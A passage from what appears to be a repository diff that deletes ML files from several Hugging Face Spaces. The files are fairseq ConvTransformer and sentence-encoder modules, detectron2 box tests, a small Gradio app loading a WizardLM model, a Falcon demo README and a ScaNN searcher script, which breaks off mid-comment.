- "--encoder-normalize-before",
- action="store_true",
- help="apply layernorm before each encoder block",
- )
- parser.add_argument(
- "--decoder-embed-dim",
- type=int,
- metavar="N",
- help="decoder embedding dimension",
- )
- parser.add_argument(
- "--decoder-ffn-embed-dim",
- type=int,
- metavar="N",
- help="decoder embedding dimension for FFN",
- )
- parser.add_argument(
- "--decoder-layers", type=int, metavar="N", help="num decoder layers"
- )
- parser.add_argument(
- "--decoder-attention-heads",
- type=int,
- metavar="N",
- help="num decoder attention heads",
- )
- parser.add_argument(
- "--decoder-normalize-before",
- action="store_true",
- help="apply layernorm before each decoder block",
- )
- parser.add_argument(
- "--decoder-output-dim",
- type=int,
- metavar="N",
- help="decoder output dimension (extra linear layer if different from decoder embed dim)",
- )
- parser.add_argument(
- "--share-decoder-input-output-embed",
- action="store_true",
- help="share decoder input and output embeddings",
- )
- parser.add_argument(
- "--layernorm-embedding",
- action="store_true",
- help="add layernorm to embedding",
- )
- parser.add_argument(
- "--no-scale-embedding",
- action="store_true",
- help="if True, dont scale embeddings",
- )
- parser.add_argument(
- "--load-pretrained-encoder-from",
- type=str,
- metavar="STR",
- help="model to take encoder weights from (for initialization)",
- )
- parser.add_argument(
- "--load-pretrained-decoder-from",
- type=str,
- metavar="STR",
- help="model to take decoder weights from (for initialization)",
- )
- parser.add_argument(
- "--conv-out-channels",
- type=int,
- metavar="INT",
- help="the number of output channels of conv layer",
- )
-
- @classmethod
- def build_encoder(cls, args):
- encoder = ConvTransformerEncoder(args)
- if getattr(args, "load_pretrained_encoder_from", None):
- encoder = checkpoint_utils.load_pretrained_component_from_model(
- component=encoder, checkpoint=args.load_pretrained_encoder_from
- )
- return encoder
-
- @classmethod
- def build_decoder(cls, args, task, embed_tokens):
- decoder = TransformerDecoderNoExtra(args, task.target_dictionary, embed_tokens)
- if getattr(args, "load_pretrained_decoder_from", None):
- decoder = checkpoint_utils.load_pretrained_component_from_model(
- component=decoder, checkpoint=args.load_pretrained_decoder_from
- )
- return decoder
-
- @classmethod
- def build_model(cls, args, task):
- """Build a new model instance."""
-
- # make sure all arguments are present in older models
- base_architecture(args)
-
- def build_embedding(dictionary, embed_dim):
- num_embeddings = len(dictionary)
- padding_idx = dictionary.pad()
- return Embedding(num_embeddings, embed_dim, padding_idx)
-
- decoder_embed_tokens = build_embedding(
- task.target_dictionary, args.decoder_embed_dim
- )
- encoder = cls.build_encoder(args)
- decoder = cls.build_decoder(args, task, decoder_embed_tokens)
- return cls(encoder, decoder)
-
- @staticmethod
- @torch.jit.unused
- def set_batch_first(lprobs):
- lprobs.batch_first = True
-
- def get_normalized_probs(
- self,
- net_output: Tuple[Tensor, Optional[Dict[str, List[Optional[Tensor]]]]],
- log_probs: bool,
- sample: Optional[Dict[str, Tensor]] = None,
- ):
- # net_output['encoder_out'] is a (B, T, D) tensor
- lprobs = self.get_normalized_probs_scriptable(net_output, log_probs, sample)
- if self.training:
- self.set_batch_first(lprobs)
- return lprobs
-
- def output_layout(self):
- return "BTD"
-
- """
- The forward method inherited from the base class has a **kwargs argument in
- its input, which is not supported in torchscript. This method overrides the forward
- method definition without **kwargs.
- """
-
- def forward(self, src_tokens, src_lengths, prev_output_tokens):
- encoder_out = self.encoder(src_tokens=src_tokens, src_lengths=src_lengths)
- decoder_out = self.decoder(
- prev_output_tokens=prev_output_tokens, encoder_out=encoder_out
- )
- return decoder_out
-
-
-class ConvTransformerEncoder(FairseqEncoder):
- """Conv + Transformer encoder"""
-
- def __init__(self, args):
- """Construct an Encoder object."""
- super().__init__(None)
-
- self.dropout = args.dropout
- self.embed_scale = (
- 1.0 if args.no_scale_embedding else math.sqrt(args.encoder_embed_dim)
- )
- self.padding_idx = 1
- self.in_channels = 1
- self.input_dim = args.input_feat_per_channel
- self.conv = torch.nn.Sequential(
- torch.nn.Conv2d(1, args.conv_out_channels, 3, stride=2, padding=3 // 2),
- torch.nn.ReLU(),
- torch.nn.Conv2d(
- args.conv_out_channels,
- args.conv_out_channels,
- 3,
- stride=2,
- padding=3 // 2,
- ),
- torch.nn.ReLU(),
- )
- transformer_input_dim = self.infer_conv_output_dim(
- self.in_channels, self.input_dim, args.conv_out_channels
- )
- self.out = torch.nn.Linear(transformer_input_dim, args.encoder_embed_dim)
- self.embed_positions = PositionalEmbedding(
- args.max_source_positions,
- args.encoder_embed_dim,
- self.padding_idx,
- learned=False,
- )
-
- self.transformer_layers = nn.ModuleList([])
- self.transformer_layers.extend(
- [TransformerEncoderLayer(args) for i in range(args.encoder_layers)]
- )
- if args.encoder_normalize_before:
- self.layer_norm = LayerNorm(args.encoder_embed_dim)
- else:
- self.layer_norm = None
-
- def pooling_ratio(self):
- return 4
-
- def infer_conv_output_dim(self, in_channels, input_dim, out_channels):
- sample_seq_len = 200
- sample_bsz = 10
- x = torch.randn(sample_bsz, in_channels, sample_seq_len, input_dim)
- x = torch.nn.Conv2d(1, out_channels, 3, stride=2, padding=3 // 2)(x)
- x = torch.nn.Conv2d(out_channels, out_channels, 3, stride=2, padding=3 // 2)(x)
- x = x.transpose(1, 2)
- mb, seq = x.size()[:2]
- return x.contiguous().view(mb, seq, -1).size(-1)
-
- def forward(self, src_tokens, src_lengths):
- """Encode input sequence.
- :param torch.Tensor src_tokens: padded source features, shape (B, T, feat_dim)
- :param torch.Tensor src_lengths: lengths of the source sequences, shape (B,)
- :return: dictionary with encoder outputs, padding mask and bookkeeping lists
- :rtype Dict[str, List[torch.Tensor]]:
- """
- bsz, max_seq_len, _ = src_tokens.size()
- x = (
- src_tokens.view(bsz, max_seq_len, self.in_channels, self.input_dim)
- .transpose(1, 2)
- .contiguous()
- )
- x = self.conv(x)
- bsz, _, output_seq_len, _ = x.size()
- x = x.transpose(1, 2).transpose(0, 1).contiguous().view(output_seq_len, bsz, -1)
- x = self.out(x)
- x = self.embed_scale * x
-
- subsampling_factor = int(max_seq_len * 1.0 / output_seq_len + 0.5)
- input_len_0 = (src_lengths.float() / subsampling_factor).ceil().long()
- input_len_1 = x.size(0) * torch.ones([src_lengths.size(0)]).long().to(
- input_len_0.device
- )
- input_lengths = torch.min(input_len_0, input_len_1)
-
- encoder_padding_mask = lengths_to_padding_mask(input_lengths)
-
- positions = self.embed_positions(encoder_padding_mask).transpose(0, 1)
- x += positions
- x = F.dropout(x, p=self.dropout, training=self.training)
-
- for layer in self.transformer_layers:
- x = layer(x, encoder_padding_mask)
-
- if not encoder_padding_mask.any():
- maybe_encoder_padding_mask = None
- else:
- maybe_encoder_padding_mask = encoder_padding_mask
-
- return {
- "encoder_out": [x],
- "encoder_padding_mask": [maybe_encoder_padding_mask]
- if maybe_encoder_padding_mask is not None
- else [],
- "encoder_embedding": [],
- "encoder_states": [],
- "src_tokens": [],
- "src_lengths": [],
- }
-
- @torch.jit.export
- def reorder_encoder_out(self, encoder_out: Dict[str, List[Tensor]], new_order):
- """
- Reorder encoder output according to *new_order*.
-
- Args:
- encoder_out: output from the ``forward()`` method
- new_order (LongTensor): desired order
-
- Returns:
- *encoder_out* rearranged according to *new_order*
- """
- new_encoder_out = [encoder_out["encoder_out"][0].index_select(1, new_order)]
- if len(encoder_out["encoder_padding_mask"]) == 0:
- new_encoder_padding_mask = []
- else:
- new_encoder_padding_mask = [
- (encoder_out["encoder_padding_mask"][0]).index_select(0, new_order)
- ]
- if len(encoder_out["encoder_embedding"]) == 0:
- new_encoder_embedding = []
- else:
- new_encoder_embedding = [
- (encoder_out["encoder_embedding"][0]).index_select(0, new_order)
- ]
- encoder_states = encoder_out["encoder_states"]
- if len(encoder_states) > 0:
- for idx, state in enumerate(encoder_states):
- encoder_states[idx] = state.index_select(1, new_order)
-
- return {
- "encoder_out": new_encoder_out,
- "encoder_padding_mask": new_encoder_padding_mask,
- "encoder_embedding": new_encoder_embedding,
- "encoder_states": encoder_states,
- "src_tokens": [],
- "src_lengths": [],
- }
-
-
-class TransformerDecoderNoExtra(TransformerDecoder):
- def extract_features(
- self,
- prev_output_tokens,
- encoder_out: Optional[Dict[str, List[Tensor]]],
- incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
- full_context_alignment: bool = False,
- alignment_layer: Optional[int] = None,
- alignment_heads: Optional[int] = None,
- ):
- # call scriptable method from parent class
- x, _ = self.extract_features_scriptable(
- prev_output_tokens,
- encoder_out,
- incremental_state,
- full_context_alignment,
- alignment_layer,
- alignment_heads,
- )
- return x, None
-
-
-@register_model_architecture(model_name="convtransformer", arch_name="convtransformer")
-def base_architecture(args):
- args.input_feat_per_channel = getattr(args, "input_feat_per_channel", 80)
- args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 512)
- args.encoder_ffn_embed_dim = getattr(args, "encoder_ffn_embed_dim", 2048)
- args.encoder_layers = getattr(args, "encoder_layers", 6)
- args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 8)
- args.encoder_normalize_before = getattr(args, "encoder_normalize_before", False)
- args.decoder_embed_dim = getattr(args, "decoder_embed_dim", args.encoder_embed_dim)
- args.decoder_ffn_embed_dim = getattr(
- args, "decoder_ffn_embed_dim", args.encoder_ffn_embed_dim
- )
- args.decoder_layers = getattr(args, "decoder_layers", 6)
- args.decoder_attention_heads = getattr(args, "decoder_attention_heads", 8)
- args.decoder_normalize_before = getattr(args, "decoder_normalize_before", False)
- args.decoder_learned_pos = getattr(args, "decoder_learned_pos", False)
- args.attention_dropout = getattr(args, "attention_dropout", 0.0)
- args.activation_dropout = getattr(args, "activation_dropout", 0.0)
- args.activation_fn = getattr(args, "activation_fn", "relu")
- args.dropout = getattr(args, "dropout", 0.1)
- args.adaptive_softmax_cutoff = getattr(args, "adaptive_softmax_cutoff", None)
- args.adaptive_softmax_dropout = getattr(args, "adaptive_softmax_dropout", 0)
- args.share_decoder_input_output_embed = getattr(
- args, "share_decoder_input_output_embed", False
- )
- args.no_token_positional_embeddings = getattr(
- args, "no_token_positional_embeddings", False
- )
- args.adaptive_input = getattr(args, "adaptive_input", False)
- args.decoder_layerdrop = getattr(args, "decoder_layerdrop", 0.0)
-
- args.decoder_output_dim = getattr(
- args, "decoder_output_dim", args.decoder_embed_dim
- )
- args.decoder_input_dim = getattr(args, "decoder_input_dim", args.decoder_embed_dim)
- args.no_scale_embedding = getattr(args, "no_scale_embedding", False)
- args.quant_noise_pq = getattr(args, "quant_noise_pq", 0)
- args.max_source_positions = getattr(args, "max_source_positions", 3000)
- args.max_target_positions = getattr(args, "max_target_positions", 1024)
- args.tie_adaptive_weights = getattr(args, "tie_adaptive_weights", False)
- args.conv_out_channels = getattr(args, "conv_out_channels", args.encoder_embed_dim)
-
-
-@register_model_architecture("convtransformer", "convtransformer_espnet")
-def convtransformer_espnet(args):
- args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 256)
- args.encoder_layers = getattr(args, "encoder_layers", 12)
- args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 4)
- args.decoder_attention_heads = getattr(args, "decoder_attention_heads", 4)
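
For context on `reorder_encoder_out` above: during beam search the effective batch order changes at every step, so the cached encoder output, laid out as (time, batch, channels), and the (batch, time) padding mask must be permuted with the same index. A minimal sketch of that `index_select` pattern with made-up shapes (an illustration only, not the fairseq beam-search machinery itself):

    import torch

    # Encoder output shaped (T, B, C): T=4 time steps, B=3 sequences, C=8 channels.
    encoder_out = torch.randn(4, 3, 8)
    # Padding mask shaped (B, T), so it is reordered along dim 0 rather than dim 1.
    encoder_padding_mask = torch.zeros(3, 4, dtype=torch.bool)

    # Suppose the search decides the new batch order is [2, 0, 1].
    new_order = torch.tensor([2, 0, 1])

    reordered_out = encoder_out.index_select(1, new_order)             # batch dim is 1 for (T, B, C)
    reordered_mask = encoder_padding_mask.index_select(0, new_order)   # batch dim is 0 for (B, T)

    assert torch.equal(reordered_out[:, 0], encoder_out[:, 2])
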
diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/modules/transformer_sentence_encoder_layer.py b/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/modules/transformer_sentence_encoder_layer.py
deleted file mode 100644
index f869c4b2f8fb15f96a292e39bd293df7898a4fce..0000000000000000000000000000000000000000
--- a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/modules/transformer_sentence_encoder_layer.py
+++ /dev/null
@@ -1,139 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-#
-# This source code is licensed under the MIT license found in the
-# LICENSE file in the root directory of this source tree.
-
-from typing import Callable, Optional
-
-import torch
-import torch.nn as nn
-from fairseq import utils
-from fairseq.modules import LayerNorm, MultiheadAttention
-from fairseq.modules.fairseq_dropout import FairseqDropout
-from fairseq.modules.quant_noise import quant_noise
-
-
-class TransformerSentenceEncoderLayer(nn.Module):
- """
- Implements a Transformer Encoder Layer used in BERT/XLM style pre-trained
- models.
- """
-
- def __init__(
- self,
- embedding_dim: int = 768,
- ffn_embedding_dim: int = 3072,
- num_attention_heads: int = 8,
- dropout: float = 0.1,
- attention_dropout: float = 0.1,
- activation_dropout: float = 0.1,
- activation_fn: str = "relu",
- export: bool = False,
- q_noise: float = 0.0,
- qn_block_size: int = 8,
- init_fn: Optional[Callable] = None,
- ) -> None:
- super().__init__()
-
- if init_fn is not None:
- init_fn()
-
- # Initialize parameters
- self.embedding_dim = embedding_dim
- self.num_attention_heads = num_attention_heads
- self.attention_dropout = attention_dropout
- self.q_noise = q_noise
- self.qn_block_size = qn_block_size
-
- self.dropout_module = FairseqDropout(
- dropout, module_name=self.__class__.__name__
- )
- self.activation_dropout_module = FairseqDropout(
- activation_dropout, module_name=self.__class__.__name__
- )
-
- # Initialize blocks
- self.activation_fn = utils.get_activation_fn(activation_fn)
- self.self_attn = self.build_self_attention(
- self.embedding_dim,
- num_attention_heads,
- dropout=attention_dropout,
- self_attention=True,
- q_noise=q_noise,
- qn_block_size=qn_block_size,
- )
-
- # layer norm associated with the self attention layer
- self.self_attn_layer_norm = LayerNorm(self.embedding_dim, export=export)
-
- self.fc1 = self.build_fc1(
- self.embedding_dim,
- ffn_embedding_dim,
- q_noise=q_noise,
- qn_block_size=qn_block_size,
- )
- self.fc2 = self.build_fc2(
- ffn_embedding_dim,
- self.embedding_dim,
- q_noise=q_noise,
- qn_block_size=qn_block_size,
- )
-
- # layer norm associated with the position wise feed-forward NN
- self.final_layer_norm = LayerNorm(self.embedding_dim, export=export)
-
- def build_fc1(self, input_dim, output_dim, q_noise, qn_block_size):
- return quant_noise(nn.Linear(input_dim, output_dim), q_noise, qn_block_size)
-
- def build_fc2(self, input_dim, output_dim, q_noise, qn_block_size):
- return quant_noise(nn.Linear(input_dim, output_dim), q_noise, qn_block_size)
-
- def build_self_attention(
- self,
- embed_dim,
- num_attention_heads,
- dropout,
- self_attention,
- q_noise,
- qn_block_size,
- ):
- return MultiheadAttention(
- embed_dim,
- num_attention_heads,
- dropout=dropout,
- self_attention=True,
- q_noise=q_noise,
- qn_block_size=qn_block_size,
- )
-
- def forward(
- self,
- x: torch.Tensor,
- self_attn_mask: Optional[torch.Tensor] = None,
- self_attn_padding_mask: Optional[torch.Tensor] = None,
- ):
- """
- LayerNorm is applied either before or after the self-attention/ffn
- modules similar to the original Transformer implementation.
- """
- residual = x
- x, attn = self.self_attn(
- query=x,
- key=x,
- value=x,
- key_padding_mask=self_attn_padding_mask,
- need_weights=False,
- attn_mask=self_attn_mask,
- )
- x = self.dropout_module(x)
- x = residual + x
- x = self.self_attn_layer_norm(x)
-
- residual = x
- x = self.activation_fn(self.fc1(x))
- x = self.activation_dropout_module(x)
- x = self.fc2(x)
- x = self.dropout_module(x)
- x = residual + x
- x = self.final_layer_norm(x)
- return x, attn
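
The forward pass above is the classic post-LN ordering: self-attention, dropout, residual add, LayerNorm, then a two-layer feed-forward block with the same dropout/residual/LayerNorm pattern. A minimal self-contained sketch of that ordering, using torch.nn.MultiheadAttention in place of fairseq's MultiheadAttention and arbitrary example dimensions:

    import torch
    import torch.nn as nn

    class TinyPostLNLayer(nn.Module):
        """Post-LN encoder layer: the norm is applied after each residual addition."""
        def __init__(self, dim=64, ffn_dim=128, heads=4, p=0.1):
            super().__init__()
            self.attn = nn.MultiheadAttention(dim, heads, dropout=p)  # expects (T, B, C) inputs
            self.drop = nn.Dropout(p)
            self.ln_attn = nn.LayerNorm(dim)
            self.fc1 = nn.Linear(dim, ffn_dim)
            self.fc2 = nn.Linear(ffn_dim, dim)
            self.ln_ffn = nn.LayerNorm(dim)

        def forward(self, x, padding_mask=None):
            residual = x
            x, _ = self.attn(x, x, x, key_padding_mask=padding_mask, need_weights=False)
            x = self.ln_attn(residual + self.drop(x))         # residual add, then norm
            residual = x
            x = self.fc2(self.drop(torch.relu(self.fc1(x))))  # activation dropout sits between fc1 and fc2
            return self.ln_ffn(residual + self.drop(x))

    out = TinyPostLNLayer()(torch.randn(10, 2, 64))  # (T=10, B=2, C=64) -> same shape
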
diff --git a/spaces/Oddity/ehartford-WizardLM-13B-Uncensored/app.py b/spaces/Oddity/ehartford-WizardLM-13B-Uncensored/app.py
deleted file mode 100644
index 2b7a0e1fa266ee2589462ccd4648d5afa5613377..0000000000000000000000000000000000000000
--- a/spaces/Oddity/ehartford-WizardLM-13B-Uncensored/app.py
+++ /dev/null
@@ -1,3 +0,0 @@
-import gradio as gr
-
-gr.Interface.load("models/ehartford/WizardLM-13B-Uncensored").launch()
\ No newline at end of file
diff --git a/spaces/Olga19821109/falcon180b/README.md b/spaces/Olga19821109/falcon180b/README.md
deleted file mode 100644
index 04189396d29fcc4721c66850250efc7c85a18276..0000000000000000000000000000000000000000
--- a/spaces/Olga19821109/falcon180b/README.md
+++ /dev/null
@@ -1,10 +0,0 @@
----
-title: Falcon-180B Demo
-emoji: 💬
-colorFrom: indigo
-colorTo: purple
-sdk: gradio
-sdk_version: 3.42.0
-app_file: app.py
-duplicated_from: tiiuae/falcon-180b-demo
----
diff --git a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/tests/structures/test_boxes.py b/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/tests/structures/test_boxes.py
deleted file mode 100644
index 101191818c511cf90c3c8f2cbc55aa49295697fa..0000000000000000000000000000000000000000
--- a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/tests/structures/test_boxes.py
+++ /dev/null
@@ -1,223 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-import json
-import math
-import numpy as np
-import unittest
-import torch
-
-from detectron2.structures import Boxes, BoxMode, pairwise_ioa, pairwise_iou
-from detectron2.utils.testing import reload_script_model
-
-
-class TestBoxMode(unittest.TestCase):
- def _convert_xy_to_wh(self, x):
- return BoxMode.convert(x, BoxMode.XYXY_ABS, BoxMode.XYWH_ABS)
-
- def _convert_xywha_to_xyxy(self, x):
- return BoxMode.convert(x, BoxMode.XYWHA_ABS, BoxMode.XYXY_ABS)
-
- def _convert_xywh_to_xywha(self, x):
- return BoxMode.convert(x, BoxMode.XYWH_ABS, BoxMode.XYWHA_ABS)
-
- def test_convert_int_mode(self):
- BoxMode.convert([1, 2, 3, 4], 0, 1)
-
- def test_box_convert_list(self):
- for tp in [list, tuple]:
- box = tp([5.0, 5.0, 10.0, 10.0])
- output = self._convert_xy_to_wh(box)
- self.assertIsInstance(output, tp)
- self.assertIsInstance(output[0], float)
- self.assertEqual(output, tp([5.0, 5.0, 5.0, 5.0]))
-
- with self.assertRaises(Exception):
- self._convert_xy_to_wh([box])
-
- def test_box_convert_array(self):
- box = np.asarray([[5, 5, 10, 10], [1, 1, 2, 3]])
- output = self._convert_xy_to_wh(box)
- self.assertEqual(output.dtype, box.dtype)
- self.assertEqual(output.shape, box.shape)
- self.assertTrue((output[0] == [5, 5, 5, 5]).all())
- self.assertTrue((output[1] == [1, 1, 1, 2]).all())
-
- def test_box_convert_cpu_tensor(self):
- box = torch.tensor([[5, 5, 10, 10], [1, 1, 2, 3]])
- output = self._convert_xy_to_wh(box)
- self.assertEqual(output.dtype, box.dtype)
- self.assertEqual(output.shape, box.shape)
- output = output.numpy()
- self.assertTrue((output[0] == [5, 5, 5, 5]).all())
- self.assertTrue((output[1] == [1, 1, 1, 2]).all())
-
- @unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
- def test_box_convert_cuda_tensor(self):
- box = torch.tensor([[5, 5, 10, 10], [1, 1, 2, 3]]).cuda()
- output = self._convert_xy_to_wh(box)
- self.assertEqual(output.dtype, box.dtype)
- self.assertEqual(output.shape, box.shape)
- self.assertEqual(output.device, box.device)
- output = output.cpu().numpy()
- self.assertTrue((output[0] == [5, 5, 5, 5]).all())
- self.assertTrue((output[1] == [1, 1, 1, 2]).all())
-
- def test_box_convert_xywha_to_xyxy_list(self):
- for tp in [list, tuple]:
- box = tp([50, 50, 30, 20, 0])
- output = self._convert_xywha_to_xyxy(box)
- self.assertIsInstance(output, tp)
- self.assertEqual(output, tp([35, 40, 65, 60]))
-
- with self.assertRaises(Exception):
- self._convert_xywha_to_xyxy([box])
-
- def test_box_convert_xywha_to_xyxy_array(self):
- for dtype in [np.float64, np.float32]:
- box = np.asarray(
- [
- [50, 50, 30, 20, 0],
- [50, 50, 30, 20, 90],
- [1, 1, math.sqrt(2), math.sqrt(2), -45],
- ],
- dtype=dtype,
- )
- output = self._convert_xywha_to_xyxy(box)
- self.assertEqual(output.dtype, box.dtype)
- expected = np.asarray([[35, 40, 65, 60], [40, 35, 60, 65], [0, 0, 2, 2]], dtype=dtype)
- self.assertTrue(np.allclose(output, expected, atol=1e-6), "output={}".format(output))
-
- def test_box_convert_xywha_to_xyxy_tensor(self):
- for dtype in [torch.float32, torch.float64]:
- box = torch.tensor(
- [
- [50, 50, 30, 20, 0],
- [50, 50, 30, 20, 90],
- [1, 1, math.sqrt(2), math.sqrt(2), -45],
- ],
- dtype=dtype,
- )
- output = self._convert_xywha_to_xyxy(box)
- self.assertEqual(output.dtype, box.dtype)
- expected = torch.tensor([[35, 40, 65, 60], [40, 35, 60, 65], [0, 0, 2, 2]], dtype=dtype)
-
- self.assertTrue(torch.allclose(output, expected, atol=1e-6), "output={}".format(output))
-
- def test_box_convert_xywh_to_xywha_list(self):
- for tp in [list, tuple]:
- box = tp([50, 50, 30, 20])
- output = self._convert_xywh_to_xywha(box)
- self.assertIsInstance(output, tp)
- self.assertEqual(output, tp([65, 60, 30, 20, 0]))
-
- with self.assertRaises(Exception):
- self._convert_xywh_to_xywha([box])
-
- def test_box_convert_xywh_to_xywha_array(self):
- for dtype in [np.float64, np.float32]:
- box = np.asarray([[30, 40, 70, 60], [30, 40, 60, 70], [-1, -1, 2, 2]], dtype=dtype)
- output = self._convert_xywh_to_xywha(box)
- self.assertEqual(output.dtype, box.dtype)
- expected = np.asarray(
- [[65, 70, 70, 60, 0], [60, 75, 60, 70, 0], [0, 0, 2, 2, 0]], dtype=dtype
- )
- self.assertTrue(np.allclose(output, expected, atol=1e-6), "output={}".format(output))
-
- def test_box_convert_xywh_to_xywha_tensor(self):
- for dtype in [torch.float32, torch.float64]:
- box = torch.tensor([[30, 40, 70, 60], [30, 40, 60, 70], [-1, -1, 2, 2]], dtype=dtype)
- output = self._convert_xywh_to_xywha(box)
- self.assertEqual(output.dtype, box.dtype)
- expected = torch.tensor(
- [[65, 70, 70, 60, 0], [60, 75, 60, 70, 0], [0, 0, 2, 2, 0]], dtype=dtype
- )
-
- self.assertTrue(torch.allclose(output, expected, atol=1e-6), "output={}".format(output))
-
- def test_json_serializable(self):
- payload = {"box_mode": BoxMode.XYWH_REL}
- try:
- json.dumps(payload)
- except Exception:
- self.fail("JSON serialization failed")
-
- def test_json_deserializable(self):
- payload = '{"box_mode": 2}'
- obj = json.loads(payload)
- try:
- obj["box_mode"] = BoxMode(obj["box_mode"])
- except Exception:
- self.fail("JSON deserialization failed")
-
-
-class TestBoxIOU(unittest.TestCase):
- def create_boxes(self):
- boxes1 = torch.tensor([[0.0, 0.0, 1.0, 1.0], [0.0, 0.0, 1.0, 1.0]])
-
- boxes2 = torch.tensor(
- [
- [0.0, 0.0, 1.0, 1.0],
- [0.0, 0.0, 0.5, 1.0],
- [0.0, 0.0, 1.0, 0.5],
- [0.0, 0.0, 0.5, 0.5],
- [0.5, 0.5, 1.0, 1.0],
- [0.5, 0.5, 1.5, 1.5],
- ]
- )
- return boxes1, boxes2
-
- def test_pairwise_iou(self):
- boxes1, boxes2 = self.create_boxes()
- expected_ious = torch.tensor(
- [
- [1.0, 0.5, 0.5, 0.25, 0.25, 0.25 / (2 - 0.25)],
- [1.0, 0.5, 0.5, 0.25, 0.25, 0.25 / (2 - 0.25)],
- ]
- )
-
- ious = pairwise_iou(Boxes(boxes1), Boxes(boxes2))
- self.assertTrue(torch.allclose(ious, expected_ious))
-
- def test_pairwise_ioa(self):
- boxes1, boxes2 = self.create_boxes()
- expected_ioas = torch.tensor(
- [[1.0, 1.0, 1.0, 1.0, 1.0, 0.25], [1.0, 1.0, 1.0, 1.0, 1.0, 0.25]]
- )
- ioas = pairwise_ioa(Boxes(boxes1), Boxes(boxes2))
- self.assertTrue(torch.allclose(ioas, expected_ioas))
-
-
-class TestBoxes(unittest.TestCase):
- def test_empty_cat(self):
- x = Boxes.cat([])
- self.assertEqual(x.tensor.shape, (0, 4))
-
- def test_to(self):
- x = Boxes(torch.rand(3, 4))
- self.assertEqual(x.to(device="cpu").tensor.device.type, "cpu")
-
- def test_scriptability(self):
- def func(x):
- boxes = Boxes(x)
- test = boxes.to(torch.device("cpu")).tensor
- return boxes.area(), test
-
- f = torch.jit.script(func)
- f = reload_script_model(f)
- f(torch.rand((3, 4)))
-
- data = torch.rand((3, 4))
-
- def func_cat(x: torch.Tensor):
- boxes1 = Boxes(x)
- boxes2 = Boxes(x)
- # boxes3 = Boxes.cat([boxes1, boxes2]) # this is not supported by torchscript for now.
- boxes3 = boxes1.cat([boxes1, boxes2])
- return boxes3
-
- f = torch.jit.script(func_cat)
- script_box = f(data)
- self.assertTrue(torch.equal(torch.cat([data, data]), script_box.tensor))
-
-
-if __name__ == "__main__":
- unittest.main()
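
The expected values in the rotated-box tests above follow directly from the XYWHA_ABS convention: (center_x, center_y, width, height, angle in degrees). At angle 0 the conversion to XYXY_ABS is just the center plus or minus half the extent, and at 90 degrees width and height swap roles. A quick arithmetic check of the first test case (a worked example, not detectron2 code):

    cx, cy, w, h, angle = 50, 50, 30, 20, 0
    x1, y1 = cx - w / 2, cy - h / 2   # 35, 40
    x2, y2 = cx + w / 2, cy + h / 2   # 65, 60
    assert (x1, y1, x2, y2) == (35, 40, 65, 60)  # matches the expected output in the test
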
diff --git a/spaces/PSLD/PSLD/stable-diffusion/scripts/train_searcher.py b/spaces/PSLD/PSLD/stable-diffusion/scripts/train_searcher.py
deleted file mode 100644
index 1e7904889c0145f9fb740fd4ae8e45c08728b255..0000000000000000000000000000000000000000
--- a/spaces/PSLD/PSLD/stable-diffusion/scripts/train_searcher.py
+++ /dev/null
@@ -1,147 +0,0 @@
-import os, sys
-import numpy as np
-import scann
-import argparse
-import glob
-from multiprocessing import cpu_count
-from tqdm import tqdm
-
-from ldm.util import parallel_data_prefetch
-
-
-def search_bruteforce(searcher):
- return searcher.score_brute_force().build()
-
-
-def search_partioned_ah(searcher, dims_per_block, aiq_threshold, reorder_k,
- partioning_trainsize, num_leaves, num_leaves_to_search):
- return searcher.tree(num_leaves=num_leaves,
- num_leaves_to_search=num_leaves_to_search,
- training_sample_size=partioning_trainsize). \
- score_ah(dims_per_block, anisotropic_quantization_threshold=aiq_threshold).reorder(reorder_k).build()
-
-
-def search_ah(searcher, dims_per_block, aiq_threshold, reorder_k):
- return searcher.score_ah(dims_per_block, anisotropic_quantization_threshold=aiq_threshold).reorder(
- reorder_k).build()
-
-def load_datapool(dpath):
-
-
- def load_single_file(saved_embeddings):
- compressed = np.load(saved_embeddings)
- database = {key: compressed[key] for key in compressed.files}
- return database
-
- def load_multi_files(data_archive):
- database = {key: [] for key in data_archive[0].files}
- for d in tqdm(data_archive, desc=f'Loading datapool from {len(data_archive)} individual files.'):
- for key in d.files:
- database[key].append(d[key])
-
- return database
-
- print(f'Loading saved patch embeddings from "{dpath}"')
- file_content = glob.glob(os.path.join(dpath, '*.npz'))
-
- if len(file_content) == 1:
- data_pool = load_single_file(file_content[0])
- elif len(file_content) > 1:
- data = [np.load(f) for f in file_content]
- prefetched_data = parallel_data_prefetch(load_multi_files, data,
- n_proc=min(len(data), cpu_count()), target_data_type='dict')
-
- data_pool = {key: np.concatenate([od[key] for od in prefetched_data], axis=1)[0] for key in prefetched_data[0].keys()}
- else:
- raise ValueError(f'No npz files found in specified path "{dpath}". Does this directory exist?')
-
- print(f'Finished loading of retrieval database of length {data_pool["embedding"].shape[0]}.')
- return data_pool
-
-
-def train_searcher(opt,
- metric='dot_product',
- partioning_trainsize=None,
- reorder_k=None,
- # todo tune
- aiq_thld=0.2,
- dims_per_block=2,
- num_leaves=None,
- num_leaves_to_search=None,):
-
- data_pool = load_datapool(opt.database)
- k = opt.knn
-
- if not reorder_k:
- reorder_k = 2 * k
-
- # normalize
- # embeddings =
- searcher = scann.scann_ops_pybind.builder(data_pool['embedding'] / np.linalg.norm(data_pool['embedding'], axis=1)[:, np.newaxis], k, metric)
- pool_size = data_pool['embedding'].shape[0]
-
- print(*(['#'] * 100))
- print('Initializing scaNN searcher with the following values:')
- print(f'k: {k}')
- print(f'metric: {metric}')
- print(f'reorder_k: {reorder_k}')
- print(f'anisotropic_quantization_threshold: {aiq_thld}')
- print(f'dims_per_block: {dims_per_block}')
- print(*(['#'] * 100))
- print('Start training searcher....')
- print(f'N samples in pool is {pool_size}')
-
- # this reflects the recommended design choices proposed at
